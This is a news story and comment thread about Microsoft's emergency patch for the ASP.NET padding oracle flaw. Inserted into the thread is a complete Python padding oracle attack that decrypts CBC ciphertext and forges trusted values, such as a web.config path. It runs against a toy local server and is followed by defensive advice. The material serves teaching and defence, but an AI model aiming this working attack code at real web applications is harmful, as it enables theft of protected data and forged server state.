Microsoft To Release Emergency Fix For ASP.NET Bug
Trailrunner7 writes "Microsoft on Tuesday will release an emergency out-of-band patch for the ASP.NET padding oracle attack that was disclosed earlier this month. The patch will only be available on the company's Download Center for the time being, however. The company is taking the step of releasing an emergency fix for the bug because of the seriousness of the vulnerability — which potentially affects millions of Web applications — and the fact that there are attacks ongoing against it already. The patch will fix the flaw in all versions of the .NET framework. Although Microsoft issued guidance about workarounds to defend against attacks on the ASP.NET bug shortly after it was publicly disclosed, the researchers, Juliano Rizzo and Thai Duong, said that the workarounds did not fully protect users against their attack."
Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config.
Why would decrypting a cookie allow you to read data from files on the target server?
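The question above (how can a server that only leaks "padding good" or "padding bad" let an attacker read anything?) comes down to two capabilities of a CBC padding oracle: it decrypts any ciphertext the attacker already holds, and, run in reverse, it forges a ciphertext that decrypts to a plaintext of the attacker's choosing, so the attacker can hand the server an "encrypted" value the server will trust and act on. The Python below is an added example written for this page; it is not code from the story, from Microsoft, or from Rizzo and Duong. The `Server` class, its `padding_ok` oracle and the HMAC-SHA256 Feistel stand-in cipher are assumptions made so the example runs offline without AES libraries; the sample state string and the forged `path=../web.config` value are constructed for illustration and do not reproduce the specific ASP.NET request the real attack used.

```python
import hashlib
import hmac
import os

BLOCK = 16  # block size in bytes, as for AES

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in block cipher (4-round Feistel over HMAC-SHA256), NOT AES; the attack never
# looks inside the cipher, it only watches the server's padding errors.
def _round(key, i, half):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def _feistel(key, block, decrypt=False):
    # Decrypting a Feistel network = swap the halves, run the rounds backwards, swap back.
    l, r = (block[8:], block[:8]) if decrypt else (block[:8], block[8:])
    for i in (reversed(range(4)) if decrypt else range(4)):
        l, r = r, xor(l, _round(key, i, r))
    return r + l if decrypt else l + r

def pkcs7_pad(data):
    return data + bytes([BLOCK - len(data) % BLOCK]) * (BLOCK - len(data) % BLOCK)

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

class Server:
    """Hypothetical server: CBC-encrypts client-held state; its error reveals bad padding."""
    def __init__(self, key=None):
        self.key = key or os.urandom(32)

    def encrypt(self, pt):
        pt, iv = pkcs7_pad(pt), os.urandom(BLOCK)
        out, prev = b"", iv
        for i in range(0, len(pt), BLOCK):
            prev = _feistel(self.key, xor(prev, pt[i:i + BLOCK]))
            out += prev
        return iv, out

    def decrypt(self, iv, ct):
        out, prev = b"", iv
        for i in range(0, len(ct), BLOCK):
            out += xor(prev, _feistel(self.key, ct[i:i + BLOCK], decrypt=True))
            prev = ct[i:i + BLOCK]
        return pkcs7_unpad(out)

    def padding_ok(self, iv, ct):  # the oracle: one distinguishable bad-padding response
        try:
            self.decrypt(iv, ct)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, block):
    """Recover D_k(block) byte by byte from nothing but the oracle's yes/no answers."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        prev = bytearray(pos + 1) + bytes(b ^ pad_val for b in inter[pos + 1:])  # known tail -> pad_val
        for g in range(256):
            prev[pos] = g
            if not oracle(bytes(prev), block):
                continue
            if pos == BLOCK - 1:  # rule out a longer valid padding (..02 02) posing as 01
                prev[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(prev), block)
                prev[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = g ^ pad_val
            break
        else:
            raise RuntimeError("oracle never accepted: not a padding oracle?")
    return bytes(inter)

def decrypt_with_oracle(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return pkcs7_unpad(b"".join(xor(recover_intermediate(oracle, blocks[i]), blocks[i - 1])
                                for i in range(1, len(blocks))))

def forge_with_oracle(oracle, target):
    """Build (iv, ct) the server will decrypt to `target`, never knowing the key."""
    padded = pkcs7_pad(target)
    ct_blocks = [bytes(BLOCK)]  # the final ciphertext block can be anything
    for p in reversed([padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]):
        inter = recover_intermediate(oracle, ct_blocks[0])
        ct_blocks.insert(0, xor(inter, p))  # preceding block = D_k(next) xor plaintext
    return ct_blocks[0], b"".join(ct_blocks[1:])

def demo():
    server = Server()
    iv, ct = server.encrypt(b"role=admin; session=4f2c91")  # constructed sample state
    fiv, fct = forge_with_oracle(server.padding_ok, b"path=../web.config")  # illustrative
    return decrypt_with_oracle(server.padding_ok, iv, ct), server.decrypt(fiv, fct)
```

`demo()` returns the secret recovered from the ciphertext (at most 256 oracle queries per byte, plus one confirmation query for the last byte of each block) and the plaintext the server obtains from the forged pair, which it never encrypted. The `pos == BLOCK - 1` check is the classic caveat: a random block can end in a valid two-byte padding, and without the extra query the attack silently derails. The defence is to remove the oracle rather than hide it: authenticate IV and ciphertext with a MAC that is checked before any decryption, and return one identical response for every failure. A uniform error page alone still leaves a timing difference between a MAC failure and a padding failure, which is why the workaround approach only narrows the oracle instead of closing it.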
What if you just use cookies for storing session ids?
Using cookies to store lots of secrets seems like a stupid idea to me. Server-side secrets belong server-side.
Furthermore, what if the user wants to use more than one browser window? If you are too reliant on cookies to store state it means the webapp would get confused in that scenario.
The only thing that is bogus is all the FOSS propaganda that you are spreading.
Interesting side note: The captcha /. wants me to type out says "idiotic".